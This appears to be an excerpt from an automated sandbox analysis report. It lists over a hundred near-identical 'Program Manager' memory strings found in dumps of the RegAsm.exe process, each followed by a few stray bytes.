            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|E+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<FJ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`,D
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX^8
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlDG
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(^e
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdv;
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8=Q
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0.f
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<gs
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtUe
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qx>'
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlF<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPNa
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q qO
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`-M
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q Q1
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<Fi
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q/A
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt4[
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@/+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql%2
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\fd
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDWI
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlEP
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<%_
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q-k
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,i4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL$k
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp-(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh"B
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0UM
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt\.
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<M2
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt|L
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|In
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD\[
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(E:
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT~*
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd|V
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPt^
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhbu
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`SJ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q03Y
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL+4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|(d
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHe5
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8$$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(DN
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPST
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh l
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql.
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@U(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlK/
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD}F
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlkM
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLm+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLMG
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhf%
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`2z
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`ts
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh!x
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp3A
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8$E
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@3n
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,Lu
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0V9
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<n<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD}e
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXct
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q)(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q va
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp1k
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtym
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`17
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL)?
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT8h
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q u9
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX!*
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtXc
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD{Q
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`Pk
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD[3
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXAB
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd{.
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd9-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql'
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxa=
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|'<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4{[
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`/a
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlhn
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL'i
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0RO
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q021
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlGd
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxc2
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql%
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\kW
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qJv
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXBK
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<*R
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHc_
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0TD
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q("Z
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt{C
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHBU
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT:>
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<lG
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(#-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`RA
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qH e
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qTYr
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(CE
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX6e
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdor
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|`,
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$s6
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxy$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxV`
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD.m
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHyN
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHY0
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPFp
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(8I
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql_H
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerHjP
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qTq3
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8yX
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qP%f
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtO-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$q`
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\_R
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4PL
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$PV
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@H1
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxwK
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpEa
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLa\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxy@
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL?l
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD0C
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPHF
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXWo
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qphA
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qFT
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(Vt
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4OC
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpdy
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql=5
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<=b
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX5=
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(5j
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@gF
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxU8
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q &A
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX4Q
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4Mm
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxtl
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd,6
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qP$>
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX3g
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\_q
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qH3w
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4,c
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@ep
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`&+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@hO
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhwU
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(6u
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0hY
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q j-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q 'J
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<`B
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdNI
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`&$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHxE
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|;t
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(7@
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qg^
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`fV
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql^?
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`*O
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4vI
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,D_
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qA+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpk^
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<Ck
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\cf
